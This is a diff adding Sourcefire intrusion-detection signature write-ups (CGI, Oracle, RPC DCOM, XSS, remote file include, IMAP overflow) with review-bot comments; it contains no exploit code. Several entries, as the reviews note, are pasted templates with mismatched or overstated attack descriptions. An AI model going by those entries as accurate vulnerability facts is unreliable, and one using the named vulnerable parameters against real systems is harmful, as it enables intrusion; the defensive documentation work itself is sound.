+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0717
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0687
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1075
+
+
+--
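Review bot: two of the four reference URLs still use the retired "CAN-" candidate prefix (CAN-2001-0717, CAN-1999-1075); these were promoted to CVE- identifiers years before this patch's Last-Update, so the links should read CVE-2001-0717 and CVE-1999-1075. "vulernabilities" in Detailed Information should be "vulnerabilities". The False Negatives paragraph is good and unusually specific; consider mirroring its point in Corrective Action (filtering the portmapper alone does not protect ttdbserverd, which listens on its own port).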
--- /dev/null
+++ b/doc/signatures/1555.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1555
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
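Review bot: this file is a verbatim copy of the generic CGI template, and the same text appears again in this patch for 1656, 1512 and 864 (and, with "CGI" swapped for "PHP", for 2566); nothing in any of them says which script or URI the rule matches, so an analyst cannot tell the five events apart or judge the False Positives claim of "None known". Each of these files should at least name the CGI program in Summary and Detailed Information and carry a reference. "ona web server" in Detailed Information is missing a space.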
--- /dev/null
+++ b/doc/signatures/695.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+695
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
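Review bot: Affected Systems is an empty heading, and Detailed Information does not say what traffic SID 695 matches ("an attempt is made to gain unauthorized access to an implementation of Microsoft SQL server or client" covers every SQL Server rule in the set). Fill in the product and versions, name the request or login pattern the rule keys on, and write "Microsoft SQL Server" rather than "Microsoft SQL" in Summary.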
--- /dev/null
+++ b/doc/signatures/1656.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1656
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2537.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2537
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-Cert:
+http://www.kb.cert.org/vuls/id/150236
+
+--
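Review bot: Additional References cites the US-CERT note but not the Microsoft bulletin that shipped the fix, which Corrective Action ("Apply the appropriate vendor supplied patches") relies on; add it (this is the SSL library DoS fixed in MS04-011, if I recall the bulletin correctly). "attcker" in Attack Scenarios should be "attacker", and Affected Systems should say "Windows Server 2003" rather than "2003".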
--- /dev/null
+++ b/doc/signatures/100000145.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000145
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
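Review bot: Affected Systems lists both "8.2 and prior" and "8.15 and prior"; one of these subsumes the other and the pair reads as a contradiction unless the product's version ordering is explained, so keep one line or state the fixed version instead. Summary ends in "servicel" (should be "service."), "An attacker send" should be "An attacker sends", the "Additional References" heading is missing its colon, and "Other:" is an empty subheading that should either get a URL or be dropped.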
--- /dev/null
+++ b/doc/signatures/1485.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1485
+ 
+--
+Summary:
+This event is generated when an attempt is made to access the file mkilog.exe.
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+This mkilog.exe is a Common Gateway Interface (CGI) script that can be used to view and modify SQL database contents.  It posts data to another module, ctss,idc, that creates a table based on the parameters passed to it.  If an attacker passes parameters such as a valid username and password to create a table, it may be possible to alter the table to execute commands on the vulnerable server.
+
+--
+Affected Systems:
+
+
+Attack Scenarios:
+An attacker can attempt to exploit this vulnerability to execute remote commands on the vulnerable server. 
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete file /scripts/tools/ctss.idc
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10359
+
+--
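Review bot: the "--" separator is missing between the empty Affected Systems section and Attack Scenarios, so the two headings run together. Detailed Information refers to "ctss,idc" while Corrective Action deletes "/scripts/tools/ctss.idc"; the comma is a typo. Corrective Action removes only ctss.idc, but the rule fires on mkilog.exe, which is the component the text says posts the attacker-controlled parameters; recommend removing (or restricting access to) both files, not just the backend.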
--- /dev/null
+++ b/doc/signatures/1512.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1512
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/864.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+864
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2889.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2889
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_date
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
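Review bot: the procedure name in Detailed Information is split across a line break ("drop_priority_date" / ". This procedure is included in"), which leaves a dangling period at the start of the next line; join it into one sentence, e.g. "vulnerability in the procedure drop_priority_date, which is included in sys.dbms_repcat_conf." Affected Systems reads "Oracle Oracle9i" (duplicated vendor name), and Additional References is empty for an issue that has an Oracle security alert.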
--- /dev/null
+++ b/doc/signatures/100000792.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000792
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "fg" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
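Review bot: Impact and Detailed Information are copied from the file-include template and overstate a cross-site scripting bug: "system integrity compromise", "administrative access to the server" and "execute system binaries" describe server-side code execution, which XSS in the "fg" parameter of blogroll.php does not give. Impact should describe script execution in the victim's browser (session or cookie theft, actions performed as the logged-in user), which is what the Attack Scenarios paragraph already correctly says.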
--- /dev/null
+++ b/doc/signatures/100000634.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000634
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_add_custom.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_add_custom.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
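Review bot: as with 100000408 earlier in this patch, the last paragraph of Detailed Information and all of Attack Scenarios describe credential validation rather than remote file inclusion via "admin_template_path"; drop the credentials text and describe the attacker supplying a URL to attacker-controlled PHP. "exploitation attempt has been attempted" in Summary should be "an exploitation attempt has been made", and "ona web server" is missing a space.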
--- /dev/null
+++ b/doc/signatures/100000155.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000155
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
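Review bot: Detailed Information says the server "allows basic authentication to be exchanged" and then talks about a reply "to a server challenge"; those are different IMAP mechanisms (LOGIN sends credentials directly, challenge/response belongs to AUTHENTICATE), so the text should name the mechanism whose over-long response the rule looks for. The "Additional References" heading is missing its colon and the "Other:" subheading is empty; a vendor or CVE reference would let an analyst confirm the "prior to 8.0.4" cut-off.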
--- /dev/null
+++ b/doc/signatures/2566.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2566
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
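Review bot: typo in Detailed Information, "access to a PHP application running ona web server" should read "on a web server", and "arbitrary code of the attackers choosing" (Impact and Detailed Information) needs the possessive "attacker's". The Summary for SID 2566 is the generic PHP template text and never says which PHP application or request pattern the rule matches, so an analyst reading an alert cannot tell what triggered it; add one sentence naming the application and the URI or parameter the rule looks for. The "Additional References:" section is empty.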
--- /dev/null
+++ b/doc/signatures/2301.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2301
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
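Review bot: the Attack Scenarios paragraph ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access") is pasted from the generic PHP template and does not match the Detailed Information, which describes user-input handling that lets an attacker "execute PHP code, include php files and possibly retrieve sensitive files"; rewrite the scenario around file inclusion and code execution so the two sections agree. Also fix the comma splice "handling user input, this may lead" (use a period or semicolon), capitalise "php files" as "PHP files", and add a reference in the empty "Additional References:" section since a specific product and version (Proxy2.de Advanced Poll 2.0.2) is named.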
--- /dev/null
+++ b/doc/signatures/2635.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2635
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_snapshot.begin_load" procedure is used for
+offline instantiation of snapshots.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
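Review bot: grammar in the Summary, "a Oracle database implementation" should be "an Oracle database implementation". The paragraph "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is deployment guidance for the sensor, not a description of the vulnerability, and reads oddly under Detailed Information; it belongs in Corrective Action or a dedicated configuration note. The Affected Systems entry "        Oracle 9i" is indented with eight spaces while the rest of the patch uses a single tab for that field.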
--- /dev/null
+++ b/doc/signatures/2395.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2395
+
+--
+Summary:
+This event is generated when an attempt is made to view a URL with the string "InteractiveQuery.jsp" in the name.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of
+your web site. Attackers can potentially gain access to your users'
+cookies or session ids, allowing the attacker to impersonate your
+user.
+
+--
+Detailed Information:
+BEA WebLogic supplies a CGI script InteractiveQuery.jsp that may be susceptible to cross-site scripting.  The vulnerability
+occurs because of improper sanitizing of data to the argument 'person'.  This may permit malicious code to be executed when
+a user visits a vulnerable site.
+
+--
+Affected Systems:
+BEA WebLogic 8.1 and earlier versions.
+
+--
+Attack Scenarios:
+An attacker can lure a user to a website that is vulnerable, perhaps permitting the malicious code to be executed on the user's host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the InteractiveQuery.jsp script or move it from the server's CGI path.
+
+Upgrade to the latest non affected versions of the software.
+
+Configure the web browser to not allow the execution of code.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak<judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/8938
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0624
+
+--
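Review bot: missing space in the Contributors line "Judy Novak<judy.novak@sourcefire.com>" (every other file writes "Name <email>"). Detailed Information and Corrective Action call InteractiveQuery.jsp a "CGI script" and refer to "the server's CGI path"; a .jsp file is a JavaServer Page served by WebLogic's servlet container, so say "JSP page" and "web application directory" instead. The last Corrective Action item, "Configure the web browser to not allow the execution of code", should say "active scripting" to match the cross-site scripting impact described above. Minor: "Simple", "None Known" lack the terminating period used elsewhere, and the Detailed Information lines exceed the wrap width used in the other files.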
--- /dev/null
+++ b/doc/signatures/3221.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3221
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
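Review bot: the Attack Scenarios text, "An attacker may make a request for a file with an overly long filename via a network share", does not describe the Microsoft RPC DCOM vulnerability explained in Detailed Information (a malformed RPC request to an RPC port causing a buffer overflow); it looks copied from an unrelated signature and should be rewritten to match. Typo in Ease of Attack: "Expoit code exists" should be "Exploit code exists". The "Additional References:" section is empty even though a specific Microsoft vulnerability is named and the Corrective Action cites vendor patches, so at least the vendor advisory should be listed.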
--- /dev/null
+++ b/doc/signatures/528.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 528
+
+--
+Summary:
+This event is generated when loopback traffic is seen on the network.
+
+--
+Impact:
+Possible reconnaisance.
+
+--
+Detailed Information:
+Under normal circumstances traffic to the localhost (127.0.0.0/8) should
+only be seen on the loopback interface (lo0).
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker may send traffic from a spoofed source address, in this 
+case the localhost.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
